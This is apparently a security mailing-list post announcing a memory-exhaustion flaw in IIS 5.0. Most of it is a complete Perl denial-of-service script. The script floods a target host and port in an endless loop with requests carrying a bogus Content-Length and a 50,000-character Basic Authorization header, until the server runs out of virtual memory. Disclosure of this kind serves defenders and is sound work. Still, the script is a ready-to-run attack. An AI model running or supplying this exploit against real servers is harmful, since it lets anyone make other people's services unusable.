Well, finally I have done testing about and I have made a 1gb RAM server
to get Out Of Virtual Memory and basically unusable with one script that
uses the flaw exposed on the other mails.
I suppose that now it's a real security bug.
Thanks
Ivan Hernandez
------------------------------------------------------------------------
----------------------------------------------#!/usr/bin/perl
# Written by Ivan Hernandez over code of Georgi Guninski
use IO::Socket;
print "IIS 5.0 Bogus Content-Length\n";
$port = @ARGV[1];
$host = @ARGV[0];
$req="GET /ampgn HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/vnd.ms-excel, application/vnd.ms-powerpoint,
application/msword, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Host: 192.168.0.10
Connection: Keep-Alive
Content-Length: 5300643
Authorization: Basic " . "A" x 50000 . "\r\n\r\n";
$i=0;
while (1) {
$socket[$i] = IO::Socket::INET->new(PeerAddr =>
$host,PeerPort => $port,Proto => "TCP");
syswrite($socket[$i],$req,length($req));
print ".";
$i++;
}
$i=0;
print "\nDone.";
------------------------------------------------------------------------
----------------------------------------------
